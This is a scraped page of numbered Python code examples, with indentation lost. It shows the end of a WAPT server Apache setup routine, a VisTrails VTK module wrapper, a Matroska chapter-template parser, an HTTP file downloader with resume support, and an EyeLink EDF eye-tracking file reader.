if os.path.exists('/etc/apache2/sites-enabled/wapt'):
try:
os.unlink('/etc/apache2/sites-enabled/wapt')
except Exception:
pass
if os.path.exists('/etc/apache2/sites-available/wapt'):
try:
os.unlink('/etc/apache2/sites-available/wapt')
except Exception:
pass
make_httpd_config(wapt_folder, '/opt/wapt/waptserver', fqdn)
final_msg.append('Please connect to https://' + fqdn + '/ to access the server.')
if type_debian():
enable_debian_vhost()
elif type_redhat():
enable_redhat_vhost()
reply = postconf.yesno("The Apache config has been reloaded. Do you want to force-restart Apache?")
if reply == postconf.DIALOG_OK:
start_apache()
enable_apache()
start_apache()
setup_firewall()
except subprocess.CalledProcessError as cpe:
final_msg += [
'Error while trying to configure Apache!',
'errno = ' + str(cpe.returncode) + ', output: ' + cpe.output
]
except Exception as e:
import traceback
final_msg += [
'Error while trying to configure Apache!',
traceback.format_exc()
]
width = 4 + max(10, len(max(final_msg, key=len)))
height = 2 + max(20, len(final_msg))
postconf.msgbox('\n'.join(final_msg), height=height, width=width)
0
Example 97
Project: VisTrails Source File: init.py
def class_dict(base_module, node):
"""class_dict(base_module, node) -> dict
Returns the class dictionary for the module represented by node and
with base class base_module"""
class_dict_ = {}
def update_dict(name, callable_):
if class_dict_.has_key(name):
class_dict_[name] = callable_(class_dict_[name])
elif hasattr(base_module, name):
class_dict_[name] = callable_(getattr(base_module, name))
else:
class_dict_[name] = callable_(None)
def guarded_SimpleScalarTree_wrap_compute(old_compute):
# This builds the scalar tree and makes it cacheable
def compute(self):
self.is_cacheable = lambda *args, **kwargs: True
old_compute(self)
self.vtkInstance.BuildTree()
return compute
def guarded_SetFileName_wrap_compute(old_compute):
# This checks for the presence of file in VTK readers
def compute(self):
# Skips the check if it's a vtkImageReader or vtkPLOT3DReader, because
# it has other ways of specifying files, like SetFilePrefix for
# multiple files
if any(issubclass(self.vtkClass, x)
for x in
[vtksnl.vtkBYUReader,
vtksnl.vtkImageReader,
vtksnl.vtkPLOT3DReader,
vtksnl.vtkDICOMImageReader,
vtksnl.vtkTIFFReader]):
old_compute(self)
return
if self.has_input('SetFileName'):
name = self.get_input('SetFileName')
elif self.has_input('SetFile'):
name = self.get_input('SetFile').name
else:
raise ModuleError(self, 'Missing filename')
if not os.path.isfile(name):
raise ModuleError(self, 'File does not exist')
old_compute(self)
return compute
def compute_SetDiffuseColorWidget(old_compute):
if old_compute != None:
return old_compute
def call_SetDiffuseColorWidget(self, color):
self.vtkInstance.SetDiffuseColor(color.tuple)
return call_SetDiffuseColorWidget
def compute_SetAmbientColorWidget(old_compute):
if old_compute != None:
return old_compute
def call_SetAmbientColorWidget(self, color):
self.vtkInstance.SetAmbientColor(color.tuple)
return call_SetAmbientColorWidget
def compute_SetSpecularColorWidget(old_compute):
if old_compute != None:
return old_compute
def call_SetSpecularColorWidget(self, color):
self.vtkInstance.SetSpecularColor(color.tuple)
return call_SetSpecularColorWidget
def compute_SetColorWidget(old_compute):
if old_compute != None:
return old_compute
def call_SetColorWidget(self, color):
self.vtkInstance.SetColor(color.tuple)
return call_SetColorWidget
def compute_SetEdgeColorWidget(old_compute):
if old_compute != None:
return old_compute
def call_SetEdgeColorWidget(self, color):
self.vtkInstance.SetEdgeColor(color.tuple)
return call_SetEdgeColorWidget
def compute_SetBackgroundWidget(old_compute):
if old_compute != None:
return old_compute
def call_SetBackgroundWidget(self, color):
self.vtkInstance.SetBackground(color.tuple)
return call_SetBackgroundWidget
def compute_SetBackground2Widget(old_compute):
if old_compute != None:
return old_compute
def call_SetBackground2Widget(self, color):
self.vtkInstance.SetBackground2(color.tuple)
return call_SetBackground2Widget
def compute_SetVTKCell(old_compute):
if old_compute != None:
return old_compute
def call_SetRenderWindow(self, cellObj):
if cellObj.cellWidget:
self.vtkInstance.SetRenderWindow(cellObj.cellWidget.mRenWin)
return call_SetRenderWindow
def compute_SetTransferFunction(old_compute):
# This sets the transfer function
if old_compute != None:
return old_compute
def call_SetTransferFunction(self, tf):
tf.set_on_vtk_volume_property(self.vtkInstance)
return call_SetTransferFunction
def compute_SetPointData(old_compute):
if old_compute != None:
return old_compute
def call_SetPointData(self, pd):
self.vtkInstance.GetPointData().ShallowCopy(pd)
return call_SetPointData
def compute_SetCellData(old_compute):
if old_compute != None:
return old_compute
def call_SetCellData(self, cd):
self.vtkInstance.GetCellData().ShallowCopy(cd)
return call_SetCellData
def compute_SetPointIds(old_compute):
if old_compute != None:
return old_compute
def call_SetPointIds(self, point_ids):
self.vtkInstance.GetPointIds().SetNumberOfIds(point_ids.GetNumberOfIds())
for i in xrange(point_ids.GetNumberOfIds()):
self.vtkInstance.GetPointIds().SetId(i, point_ids.GetId(i))
return call_SetPointIds
def guarded_Writer_wrap_compute(old_compute):
# The behavior for vtkWriter subclasses is to call Write()
# If the user sets a name, we will create a file with that name
# If not, we will create a temporary file from the file pool
def compute(self):
old_compute(self)
fn = self.vtkInstance.GetFileName()
if not fn:
o = self.interpreter.filePool.create_file(suffix='.vtk')
self.vtkInstance.SetFileName(o.name)
else:
o = File()
o.name = fn
self.vtkInstance.Write()
self.set_output('file', o)
return compute
for var in dir(node.klass):
# Everyone that has a Set.*FileName should have a Set.*File port too
if set_file_name_pattern.match(var):
def get_compute_SetFile(method_name):
def compute_SetFile(old_compute):
if old_compute != None:
return old_compute
def call_SetFile(self, file_obj):
getattr(self.vtkInstance, method_name)(file_obj.name)
return call_SetFile
return compute_SetFile
update_dict('_special_input_function_' + var[:-4],
get_compute_SetFile(var))
if hasattr(node.klass, 'SetFileName'):
# ... BUT we only want to check existence of filenames on
# readers. VTK is nice enough to be consistent with names, but
# this is brittle..
if node.klass.__name__.endswith('Reader'):
if not node.klass.__name__.endswith('TiffReader'):
update_dict('compute', guarded_SetFileName_wrap_compute)
if hasattr(node.klass, 'SetRenderWindow'):
update_dict('_special_input_function_SetVTKCell',
compute_SetVTKCell)
#color gui wrapping
if hasattr(node.klass, 'SetDiffuseColor'):
update_dict('_special_input_function_SetDiffuseColorWidget',
compute_SetDiffuseColorWidget)
if hasattr(node.klass, 'SetAmbientColor'):
update_dict('_special_input_function_SetAmbientColorWidget',
compute_SetAmbientColorWidget)
if hasattr(node.klass, 'SetSpecularColor'):
update_dict('_special_input_function_SetSpecularColorWidget',
compute_SetSpecularColorWidget)
if hasattr(node.klass, 'SetEdgeColor'):
update_dict('_special_input_function_SetEdgeColorWidget',
compute_SetEdgeColorWidget)
if hasattr(node.klass, 'SetColor'):
update_dict('_special_input_function_SetColorWidget',
compute_SetColorWidget)
if (issubclass(node.klass, vtksnl.vtkRenderer) and
hasattr(node.klass, 'SetBackground')):
update_dict('_special_input_function_SetBackgroundWidget',
compute_SetBackgroundWidget)
if (issubclass(node.klass, vtksnl.vtkRenderer) and
hasattr(node.klass, 'SetBackground2')):
update_dict('_special_input_function_SetBackground2Widget',
compute_SetBackground2Widget)
if issubclass(node.klass, vtksnl.vtkWriter):
update_dict('compute', guarded_Writer_wrap_compute)
if issubclass(node.klass, vtksnl.vtkScalarTree):
update_dict('compute', guarded_SimpleScalarTree_wrap_compute)
if issubclass(node.klass, vtksnl.vtkVolumeProperty):
update_dict('_special_input_function_SetTransferFunction',
compute_SetTransferFunction)
if issubclass(node.klass, vtksnl.vtkDataSet):
update_dict('_special_input_function_SetPointData',
compute_SetPointData)
update_dict('_special_input_function_SetCellData',
compute_SetCellData)
if issubclass(node.klass, vtksnl.vtkCell):
update_dict('_special_input_function_SetPointIds',
compute_SetPointIds)
return class_dict_
0
Example 98
def __init__(self, templatefile, output=None, avs=None, trims=None,
kframes=None, uid=None, label=None, ifps=None, clip=None,
idr=False):
try:
import configparser
except ImportError:
import ConfigParser as configparser
from io import open
# Init config
config = configparser.ConfigParser()
template = open(templatefile, encoding='utf-8')
# Read template
config.readfp(template)
template.close()
# Template defaults
self = self.Template()
self.editions = []
self.uid = uid if uid else self.uid
# Set mkvinfo path
from vfr import mkvmerge, parse_with_mkvinfo, fmt_time
from os.path import dirname, join, isfile
if parse_with_mkvinfo:
mkvinfo_path = join(dirname(mkvmerge), 'mkvinfo')
if not isfile(mkvinfo_path) and not isfile(mkvinfo_path + '.exe'):
import os
from subprocess import check_call, CalledProcessError
which = 'where' if os.name == 'nt' else 'which'
try:
check_call([which, 'mkvinfo'])
except CalledProcessError:
parse_with_mkvinfo = False
# Set placeholder for mkvinfo output
mkv_globbed = False
mkvinfo = {}
for k, v in config.items('info'):
if k == 'lang':
self.lang = v.split(',')
elif k == 'country':
self.country = v.split(',')
elif k == 'inputfps':
self.fps = v
elif k == 'outputfps':
self.ofps = v
elif k == 'createqpfile':
self.qpf = v
elif k == 'uid':
self.uid = int(v)
elif k == 'editions':
self.num_editions = int(v)
if avs and not ifps:
self.connect_with_vfr(avs, label, clip)
elif trims:
self.trims = trims
self.kframes = kframes
else:
self.trims = False
self.idr = idr
for i in range(self.num_editions):
from re import compile
ed = self.Edition()
ed.uid = self.uid * 100
self.uid += 1
cuid = ed.uid
ed.num = i+1
ed.chapters = []
stuff = {}
for k, v in config.items('edition{0:d}'.format(ed.num)):
if k == 'default':
ed.default = int(v)
elif k == 'name':
ed.name = v.split(',')
elif k == 'ordered':
ed.ordered = int(v)
elif k == 'hidden':
ed.hidden = int(v)
elif k == 'chapters':
ed.num_chapters = int(v)
for i in range(ed.num_chapters):
stuff[i+1] = []
elif k == 'uid':
ed.uid = int(v)
else:
opt_re = compile('(\d+)(\w+)')
ret = opt_re.search(k)
if ret:
stuff[int(ret.group(1))].append((ret.group(2),v))
for j in range(ed.num_chapters):
ch = self.Chapter()
cuid += 1
ch.uid = cuid
ch.num = j+1
for k, v in stuff[j+1]:
if k == 'name':
ch.name = v.split(',')
elif k == 'chapter':
ch.chapter = int(v)
elif k == 'start':
ch.start = v
elif k == 'end':
ch.end = v
elif k == 'suid':
ch.suid = v.strip() if ret else 0
elif k == 'hidden':
ch.hidden = int(v)
elif k == 'enabled':
ch.enabled = int(v)
if ch.suid and not isfile(ch.suid):
ch.suid = ch.suid.replace('0x','').lower().replace(' ','')
if ch.chapter and not (ch.start and ch.end):
ch.start, ch.end = self.trims[ch.chapter-1] if self.trims else (ch.start, ch.end)
elif ch.suid:
mkvfiles = []
if isfile(ch.suid):
mkvfiles = [ch.suid]
elif not mkv_globbed:
from glob import glob
mkvfiles = glob('*.mkv') + glob(join(dirname(avs),'*.mkv'))
mkv_globbed = True
if mkvfiles:
if parse_with_mkvinfo:
from subprocess import check_output
suid_re = compile('^\| \+ Segment UID:(.*)(?m)')
duration_re = compile('^\| \+ Duration: \d+\.\d*s \((\d+:\d+:\d+.\d+)\)(?m)')
for file in mkvfiles:
info = check_output([mkvinfo_path, '--ui-language', 'en', '--output-charset', 'utf-8', file]).decode('utf-8')
ret = suid_re.search(info)
ch.suid = ret.group(1).lower().strip().replace('0x','').replace(' ','') if ret else 0
ret = duration_re.search(info)
duration = ret.group(1) if ret else 0
mkvinfo[ch.suid] = {'file': file, 'duration': duration}
else:
for file in mkvfiles:
ch.suid, duration = self.parse_mkv(file)
mkvinfo[ch.suid] = {'file': file,
'duration': fmt_time(duration * 10**6)
if duration else 0}
if not (ch.start or ch.end):
ch.start = fmt_time(0) if not ch.start else ch.start
ch.end = mkvinfo[ch.suid]['duration'] if not ch.end and (ch.suid in mkvinfo) else ch.end
ed.chapters.append(ch)
self.editions.append(ed)
if output:
self.toxml(output)
0
Example 99
def real_download(self, filename, info_dict):
url = info_dict['url']
tmpfilename = self.temp_name(filename)
stream = None
# Do not include the Accept-Encoding header
headers = {'Youtubedl-no-compression': 'True'}
if 'user_agent' in info_dict:
headers['Youtubedl-user-agent'] = info_dict['user_agent']
if 'http_referer' in info_dict:
headers['Referer'] = info_dict['http_referer']
add_headers = info_dict.get('http_headers')
if add_headers:
headers.update(add_headers)
data = info_dict.get('http_post_data')
http_method = info_dict.get('http_method')
basic_request = compat_urllib_request.Request(url, data, headers)
request = compat_urllib_request.Request(url, data, headers)
if http_method is not None:
basic_request.get_method = lambda: http_method
request.get_method = lambda: http_method
is_test = self.params.get('test', False)
if is_test:
request.add_header('Range', 'bytes=0-%s' % str(self._TEST_FILE_SIZE - 1))
# Establish possible resume length
if os.path.isfile(encodeFilename(tmpfilename)):
resume_len = os.path.getsize(encodeFilename(tmpfilename))
else:
resume_len = 0
open_mode = 'wb'
if resume_len != 0:
if self.params.get('continuedl', False):
self.report_resuming_byte(resume_len)
request.add_header('Range', 'bytes=%d-' % resume_len)
open_mode = 'ab'
else:
resume_len = 0
count = 0
retries = self.params.get('retries', 0)
while count <= retries:
# Establish connection
try:
data = self.ydl.urlopen(request)
break
except (compat_urllib_error.HTTPError, ) as err:
if (err.code < 500 or err.code >= 600) and err.code != 416:
# Unexpected HTTP error
raise
elif err.code == 416:
# Unable to resume (requested range not satisfiable)
try:
# Open the connection again without the range header
data = self.ydl.urlopen(basic_request)
content_length = data.info()['Content-Length']
except (compat_urllib_error.HTTPError, ) as err:
if err.code < 500 or err.code >= 600:
raise
else:
# Examine the reported length
if (content_length is not None and
(resume_len - 100 < int(content_length) < resume_len + 100)):
# The file had already been fully downloaded.
# Explanation to the above condition: in issue #175 it was revealed that
# YouTube sometimes adds or removes a few bytes from the end of the file,
# changing the file size slightly and causing problems for some users. So
# I decided to implement a suggested change and consider the file
# completely downloaded if the file size differs less than 100 bytes from
# the one in the hard drive.
self.report_file_already_downloaded(filename)
self.try_rename(tmpfilename, filename)
self._hook_progress({
'filename': filename,
'status': 'finished',
})
return True
else:
# The length does not match, we start the download over
self.report_unable_to_resume()
resume_len = 0
open_mode = 'wb'
break
# Retry
count += 1
if count <= retries:
self.report_retry(count, retries)
if count > retries:
self.report_error('giving up after %s retries' % retries)
return False
data_len = data.info().get('Content-length', None)
# Range HTTP header may be ignored/unsupported by a webserver
# (e.g. extractor/scivee.py, extractor/bambuser.py).
# However, for a test we still would like to download just a piece of a file.
# To achieve this we limit data_len to _TEST_FILE_SIZE and manually control
# block size when downloading a file.
if is_test and (data_len is None or int(data_len) > self._TEST_FILE_SIZE):
data_len = self._TEST_FILE_SIZE
if data_len is not None:
data_len = int(data_len) + resume_len
min_data_len = self.params.get("min_filesize", None)
max_data_len = self.params.get("max_filesize", None)
if min_data_len is not None and data_len < min_data_len:
self.to_screen('\r[download] File is smaller than min-filesize (%s bytes < %s bytes). Aborting.' % (data_len, min_data_len))
return False
if max_data_len is not None and data_len > max_data_len:
self.to_screen('\r[download] File is larger than max-filesize (%s bytes > %s bytes). Aborting.' % (data_len, max_data_len))
return False
data_len_str = format_bytes(data_len)
byte_counter = 0 + resume_len
block_size = self.params.get('buffersize', 1024)
start = time.time()
# measure time over whole while-loop, so slow_down() and best_block_size() work together properly
now = None # needed for slow_down() in the first loop run
before = start # start measuring
while True:
# Download and write
data_block = data.read(block_size if not is_test else min(block_size, data_len - byte_counter))
byte_counter += len(data_block)
# exit loop when download is finished
if len(data_block) == 0:
break
# Open destination file just in time
if stream is None:
try:
(stream, tmpfilename) = sanitize_open(tmpfilename, open_mode)
assert stream is not None
filename = self.undo_temp_name(tmpfilename)
self.report_destination(filename)
except (OSError, IOError) as err:
self.report_error('unable to open for writing: %s' % str(err))
return False
try:
stream.write(data_block)
except (IOError, OSError) as err:
self.to_stderr('\n')
self.report_error('unable to write data: %s' % str(err))
return False
# Apply rate limit
self.slow_down(start, now, byte_counter - resume_len)
# end measuring of one loop run
now = time.time()
after = now
# Adjust block size
if not self.params.get('noresizebuffer', False):
block_size = self.best_block_size(after - before, len(data_block))
before = after
# Progress message
speed = self.calc_speed(start, now, byte_counter - resume_len)
if data_len is None:
eta = percent = None
else:
percent = self.calc_percent(byte_counter, data_len)
eta = self.calc_eta(start, time.time(), data_len - resume_len, byte_counter - resume_len)
self.report_progress(percent, data_len_str, speed, eta)
self._hook_progress({
'downloaded_bytes': byte_counter,
'total_bytes': data_len,
'tmpfilename': tmpfilename,
'filename': filename,
'status': 'downloading',
'eta': eta,
'speed': speed,
})
if is_test and byte_counter == data_len:
break
if stream is None:
self.to_stderr('\n')
self.report_error('Did not get any data blocks')
return False
if tmpfilename != '-':
stream.close()
self.report_finish(data_len_str, (time.time() - start))
if data_len is not None and byte_counter != data_len:
raise ContentTooShortError(byte_counter, int(data_len))
self.try_rename(tmpfilename, filename)
# Update file modification time
if self.params.get('updatetime', True):
info_dict['filetime'] = self.try_utime(filename, data.info().get('last-modified', None))
self._hook_progress({
'downloaded_bytes': byte_counter,
'total_bytes': byte_counter,
'filename': filename,
'status': 'finished',
})
return True
0
Example 100
Project: PyGazeAnalyser Source File: edfreader.py
def read_edf(filename, start, stop=None, missing=0.0, debug=False):
"""Returns a list with dicts for every trial. A trial dict contains the
following keys:
x - numpy array of x positions
y - numpy array of y positions
size - numpy array of pupil size
time - numpy array of timestamps, t=0 at trialstart
trackertime - numpy array of timestamps, according to EDF
events - dict with the following keys:
Sfix - list of lists, each containing [starttime]
Ssac - list of lists, each containing [starttime]
Sblk - list of lists, each containing [starttime]
Efix - list of lists, each containing [starttime, endtime, duration, endx, endy]
Esac - list of lists, each containing [starttime, endtime, duration, startx, starty, endx, endy]
Eblk - list of lists, each containing [starttime, endtime, duration]
msg - list of lists, each containing [time, message]
NOTE: timing is in EDF time!
arguments
filename - path to the file that has to be read
start - trial start string
keyword arguments
stop - trial ending string (default = None)
missing - value to be used for missing data (default = 0.0)
debug - Boolean indicating if DEBUG mode should be on or off;
if DEBUG mode is on, information on what the script
currently is doing will be printed to the console
(default = False)
returns
data - a list with a dict for every trial (see above)
"""
# # # # #
# debug mode
if debug:
def message(msg):
print(msg)
else:
def message(msg):
pass
# # # # #
# file handling
# check if the file exists
if os.path.isfile(filename):
# open file
message("opening file '%s'" % filename)
f = open(filename, 'r')
# raise exception if the file does not exist
else:
raise Exception("Error in read_edf: file '%s' does not exist" % filename)
# read file contents
message("reading file '%s'" % filename)
raw = f.readlines()
# close file
message("closing file '%s'" % filename)
f.close()
# # # # #
# parse lines
# variables
data = []
x = []
y = []
size = []
time = []
trackertime = []
events = {'Sfix':[],'Ssac':[],'Sblk':[],'Efix':[],'Esac':[],'Eblk':[],'msg':[]}
starttime = 0
started = False
trialend = False
finalline = raw[-1]
# loop through all lines
for line in raw:
# check if trial has already started
if started:
# only check for stop if there is one
if stop != None:
if stop in line:
started = False
trialend = True
# check for new start otherwise
else:
if (start in line) or (line == finalline):
started = True
trialend = True
# # # # #
# trial ending
if trialend:
message("trialend %d; %d samples found" % (len(data),len(x)))
# trial dict
trial = {}
trial['x'] = numpy.array(x)
trial['y'] = numpy.array(y)
trial['size'] = numpy.array(size)
trial['time'] = numpy.array(time)
trial['trackertime'] = numpy.array(trackertime)
trial['events'] = copy.deepcopy(events)
# add trial to data
data.append(trial)
# reset stuff
x = []
y = []
size = []
time = []
trackertime = []
events = {'Sfix':[],'Ssac':[],'Sblk':[],'Efix':[],'Esac':[],'Eblk':[],'msg':[]}
trialend = False
# check if the current line contains start message
else:
if start in line:
message("trialstart %d" % len(data))
# set started to True
started = True
# find starting time
starttime = int(line[line.find('\t')+1:line.find(' ')])
# # # # #
# parse line
if started:
# message lines will start with MSG, followed by a tab, then a
# timestamp, a space, and finally the message, e.g.:
# "MSG\t12345 something of importance here"
if line[0:3] == "MSG":
ms = line.find(" ") # message start
t = int(line[4:ms]) # time
m = line[ms+1:] # message
events['msg'].append([t,m])
# EDF event lines are constructed of 9 characters, followed by
# tab separated values; these values MAY CONTAIN SPACES, but
# these spaces are ignored by float() (thank you Python!)
# fixation start
elif line[0:4] == "SFIX":
message("fixation start")
l = line[9:]
events['Sfix'].append(int(l))
# fixation end
elif line[0:4] == "EFIX":
message("fixation end")
l = line[9:]
l = l.split('\t')
st = int(l[0]) # starting time
et = int(l[1]) # ending time
dur = int(l[2]) # duration
sx = replace_missing(l[3], missing=missing) # x position
sy = replace_missing(l[4], missing=missing) # y position
events['Efix'].append([st, et, dur, sx, sy])
# saccade start
elif line[0:5] == 'SSACC':
message("saccade start")
l = line[9:]
events['Ssac'].append(int(l))
# saccade end
elif line[0:5] == "ESACC":
message("saccade end")
l = line[9:]
l = l.split('\t')
st = int(l[0]) # starting time
et = int(l[1]) # endint time
dur = int(l[2]) # duration
sx = replace_missing(l[3], missing=missing) # start x position
sy = replace_missing(l[4], missing=missing) # start y position
ex = replace_missing(l[5], missing=missing) # end x position
ey = replace_missing(l[6], missing=missing) # end y position
events['Esac'].append([st, et, dur, sx, sy, ex, ey])
# blink start
elif line[0:6] == "SBLINK":
message("blink start")
l = line[9:]
events['Sblk'].append(int(l))
# blink end
elif line[0:6] == "EBLINK":
message("blink end")
l = line[9:]
l = l.split('\t')
st = int(l[0])
et = int(l[1])
dur = int(l[2])
events['Eblk'].append([st,et,dur])
# regular lines will contain tab separated values, beginning with
# a timestamp, follwed by the values that were asked to be stored
# in the EDF and a mysterious '...'. Usually, this comes down to
# timestamp, x, y, pupilsize, ...
# e.g.: "985288\t 504.6\t 368.2\t 4933.0\t..."
# NOTE: these values MAY CONTAIN SPACES, but these spaces are
# ignored by float() (thank you Python!)
else:
# see if current line contains relevant data
try:
# split by tab
l = line.split('\t')
# if first entry is a timestamp, this should work
int(l[0])
except:
message("line '%s' could not be parsed" % line)
continue # skip this line
# check missing
if float(l[3]) == 0.0:
l[1] = 0.0
l[2] = 0.0
# extract data
x.append(float(l[1]))
y.append(float(l[2]))
size.append(float(l[3]))
time.append(int(l[0])-starttime)
trackertime.append(int(l[0]))
# # # # #
# return
return data